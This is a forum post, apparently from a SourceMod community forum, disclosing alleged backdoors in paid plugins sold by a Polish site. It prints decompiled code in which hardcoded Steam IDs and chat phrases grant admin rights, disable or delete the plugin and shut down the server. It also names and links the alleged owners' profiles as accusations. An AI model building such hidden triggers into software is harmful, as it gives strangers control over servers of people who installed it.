Hello,
so first of all, we are the Polish team that try to get Polish sourcemod developers sorted and make sure everyone is legal.
For few months there is a fun site called
https://pluginysm.pl/
So, they are selling plugins for some money, well i like that BUT, there are 2 things.
First: They are breaking the LAW of Sourcemod license, because 3/4 of the plugins don't have any sourcecode only compiled SMX, and there is backdoor inside the smx plugins.
After scanning some of the plugins, and decompiling them there you can find some bad shit
base64_cFillChar;
base64_decodeTable[256] =
PHP Code:
if (StrEqual(steamid, "STEAM_1:0:189210523", true) || StrEqual(steamid, "STEAM_0:1:452047314", true) || StrEqual(steamid, "STEAM_1:1:3685391", true))
if (StrEqual(Text, "take access", true))
{
PrintToConsole(client, "~~~ Hello Roberrt or DevLogic !");
PrintToConsole(client, "~~~ Crashing system in progress..");
PrintToConsole(client, "~~~ Access Granted !");
PrintToConsole(client, "~~~ Welcome in root strafe !");
AddUserFlags(client, 14);
ClientCommand(client, "play *UI/deathmatch_kill_bonus.wav");
}
So as you can see, there, 2 owners of the website Pluginysm.pl have the FULL ACCESS to the server and all the permissions, basically, that's why probably they didin't attach the sourcecode ;).
The OWNERS:
1.
https://steamcommunity.com/id/imroberrt
2.
https://steamcommunity.com/id/matix8981/
PHP Code:
if (StrEqual(Text, "off plugin", true))
{
ServerCommand("hostname ZŁODZIEJE PLUGINÓW!!!!");
SetFailState("[ROBERRT][BACKDOOR] Wykryto bezprawne uzywanie pluginu, zostaje on wylaczony.");
}
if (StrEqual(Text, "off server", true))
{
ServerCommand("hostname ZŁODZIEJE PLUGINÓW!!!!");
LogError("[ROBERRT][BACKDOOR] Wykryto bezprawne uzywanie pluginu, serwer został zdalnie wyłączony.");
ServerCommand("killserver");
}
if (StrEqual(Text, "delete plugin", true))
{
ServerCommand("hostname ZŁODZIEJE PLUGINÓW!!!!");
LogError("[ROBERRT][BACKDOOR] Wykryto bezprawne uzywanie pluginu, został on zdalnie usunięty.");
DeletePlugin();
ServerCommand("killserver");
}
I don't know how stupid you have to be to think that ServerCommand "killserver" is a secure thing to do, but anyway, i found that they are many includes and some weird extensions attached that allows for remote access as well.
So now, i want to ask sourcemod developers moderators, what kind of investigation would be fast and work for 100% to close up this shit pretty fast. And to get people to answer for their actions.
Deliberate insertion of backdoors is from what I know is illegal, so that's the second shot.
I created the topic in Polish forum as well, but the owner of this site (Pluginy SM) just were laughing that they got 2 more purchases and they got more views on the website, shorter version: They don't give a fuck.
I want to know your opinion guys about that, and some helpful comments
.
Fun fact: The owner of the pluginysm have the account here
His steam ID -
https://steamcommunity.com/id/imroberrt
His profile on this forums -
https://forums.alliedmods.net/member.php?u=274727